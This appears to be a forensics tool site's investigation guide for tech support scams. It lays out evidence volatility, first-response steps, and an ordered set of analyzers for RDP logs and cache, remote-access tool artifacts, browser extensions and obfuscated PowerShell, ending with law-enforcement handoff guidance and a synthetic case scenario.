fatcousin
// investigation guide

tech support scam - methodology

tech support fraud is not confused users and helpful technicians. it is a scripted remote-access takeover: fake vendor pop-up, phone social engineering, RDP or RMM from an untrusted address—here 203.0.113.88—AnyDesk-style tooling, a malicious Chrome extension, obfuscated PowerShell, and selective Terminal Services log clearing to hide the session. payout is gift cards or wires, not malware glory. your job is timelines, remote-access artifacts, and browser residue before the victim wipes the machine out of shame.

what evidence exists and how fast it dies

artifactvolatilitytime to loss
Security / Terminal Services event logspersistent until rotationhours if actor clears or shrinks retention
RDP bitmap cachepersistent on diskdeleted on profile wipe or “PC cleanup” utilities
RMM / AnyDesk install metadatapersistentremoved when victim uninstalls under caller direction
browser history and extension folderspersistent on profileminutes if victim resets browser or reimages
PowerShell script cache and $PSReadLinemixedcleared by “fix scripts” or disk cleanup
victim memory (running RMM session)volatilelost on reboot while incident is live
call recording / receipts (gift cards)out-of-bandkept or destroyed by victim; not always on disk

the first 10 minutes

  1. break the remote session: unplug network or use firewall block; do not negotiate with the caller while they still have control.
  2. record exact UTC time when access started and when the pop-up first appeared.
  3. image or copy Security.evtx and any Terminal Services–related logs before Windows overwrites them.
  4. preserve %LOCALAPPDATA%\Microsoft\Terminal Server Client\Cache (RDP cache) and the user profile intact.
  5. export installed programs list focusing on AnyDesk, TeamViewer, Splashtop, or unknown “support” clients.
  6. copy the Chrome / Edge user profile Extensions and History databases read-only.
  7. search Desktop and Downloads for .ps1 / .bat dropped during the session; hash and copy.
  8. snapshot scheduled tasks and Run keys; scammers love residual persistence after the call.
  9. photograph or scan gift-card packaging and purchase receipts if the victim already paid—LE needs amounts.
  10. begin the path below on a forensic copy, not the live system still dialing the fraud hotline.

the path

  1. 1. remote desktop log clearing and gap detector

    Terminal Services / RDP-related event exports and Security.evtx slices. surfaces selective clearing, timeline gaps, and remote-session tampering before the narrative hardens.why first: actors who ran RDP cleanup often did it early. if logs were cleared, you anchor the investigation to that damage before everything else is spun as “normal IT.”

  2. 2. rdp cache parser

    RDP bitmap cache tiles from the victim profile. can recover partial screen content from the remote operator’s session—including pop-ups, payment pages, or support branding.why second: proves an interactive remote desktop session happened even when Event Log retention is thin; pairs with source IP work (e.g. 203.0.113.88) for the access story.

  3. 3. live response tool execution artifact detector

    prefetch, ShimCache, Amcache, and shortcut debris for RMM-style tools. flags AnyDesk-class remote support installs and one-off “rescue” binaries dropped during the call.why third: separates organic helpdesk software from the scammer’s remote stack. you want the install window tied to the victim’s phone timeline.

  4. 4. lolbin execution burst detector

    process creation timelines from CSV or EVTX extracts. highlights bursts of signed living-off-the-land binaries chained for download, staging, or persistence around the incident window.why fourth: staged loaders often avoid obvious malware names. burst shape shows automation or scripted playbooks under the remote session.

  5. 5. browser history extractor

    Chrome / Edge SQLite history databases. extracts the fake “Microsoft” alert page, typo domains, and support portal visits that preceded the phone call.why fifth: victims remember the pop-up, not the URL. history is the silent witness that predates RDP and gift-card pressure.

  6. 6. browser extension analyzer

    extension manifests and background script bundles from a profile export. lists permissions, content-script reach, and update URLs that do not match storefront claims.why sixth: scam operators plant “support” or “security” extensions during remote control. catch them before the victim uninstalls the browser profile.

  7. 7. chrome extension analyzer

    Chrome-specific extension packaging—CWS vs unpacked vs policy-forced IDs. pinpoints sideloaded CRX paths and enterprise policy abuse used to keep a malicious add-on sticky.why seventh: drills into Chrome-only signals when the generic analyzer already showed something off. good for Margaret Grayson-style persistent browser hooks.

  8. 8. powershell deobfuscator

    base64, string-reorder, and invoke-expression wrapped scripts from disk or transcripts. expands obfuscated download cradles and second-stage loaders into readable intent.why last: PowerShell is late-stage execution. once remote access and browser artifacts are mapped, deobfuscation explains what the actor actually ran—not what the caller claimed.

common false leads

  • “it was a virus pop-up.” many entries are pure malicious advertising or typosquats; the scam is still remote access plus payment pressure.
  • legitimate IT uses AnyDesk too. absence of a branded binary does not disprove fraud—correlate installer time with the phone call.
  • empty Security log means no intrusion. selective clearing is a control failure, not evidence of health.
  • the victim authorized the session. consent under deception is still a crime report; do not treat clicks as informed approval.
  • gift cards are untraceable recovery. focus on proving access, malware, and laundering instructions for IC3.

what we can tell you, what we can't

we can tell you:

  • Terminal Services / RDP log clearing and gap signatures from exported logs
  • RDP cache tile recovery for on-screen context during remote control
  • RMM and live-response tooling artifacts from common Windows forensics extracts
  • LOLBin execution bursts aligned to the incident clock
  • browser history and Chrome extension analysis for malicious add-ons
  • PowerShell deobfuscation for staged downloaders and callbacks

we can't tell you:

  • recover gift-card funds. issuer fraud desks and law enforcement only.
  • attribute the caller to a named individual without telco or bank subpoenas.
  • prove criminal intent in court. that is counsel and LE.
  • intercept live C2 from our tools. collect on the endpoint, analyze offline in browser.

handing it off

  • IC3 / local police: timeline UTC, phone numbers dialed, RDP/RMM IOCs, gift-card issuer and card serials if available, export of deceptive URLs.
  • financial institution fraud desk: wire attempts, Zelle/crypto pivot instructions—often parallel to gift-card pressure.
  • victim advocates / elder-support orgs: emotional stabilization before second-stage reinstall of remote tools.
  • outside counsel: preservation memo for EVTX, browser profiles, and RDP cache hashes if litigation or insurance follows.

further reading

reference investigation

synthetic fixture grayson-tech-support-scam: Margaret Grayson scenario—fake Microsoft pop-up, inbound RDP from 203.0.113.88, AnyDesk-style remote tooling, malicious Chrome extension, obfuscated PowerShell loader, Terminal Services log clearing, gift-card pressure. seed grayson-tech-support-scam:v1. compare output via npm run check:flagship.

fixture download: evidence zip · proof page: /forensics/proof/grayson-tech-support-scam · case playbook: case type tools

run the tech support scam kitforensics home
ready